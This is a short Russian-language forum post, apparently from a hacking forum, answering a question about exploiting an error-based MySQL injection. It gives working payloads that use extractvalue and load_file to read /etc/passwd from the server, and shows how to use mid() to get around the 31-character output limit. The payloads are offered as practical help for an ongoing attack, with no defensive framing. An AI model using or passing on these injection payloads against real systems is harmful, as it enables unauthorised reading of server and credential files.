04.11.2015, 10:51
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от errorbaser
↑
Есть инъекция вида:
extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))
С правами file_priv='Y'.
Как
с помощью
ее, можно читать файли на сервере?
extractvalue(1,concat(0x5c,(SELECT load_file('/etc/passwd')))) выведет только 31 символ, далее используй mid
mid(load_file('/etc/passwd'),1,30)
c 1 символа выводим 30 символов
|
|
|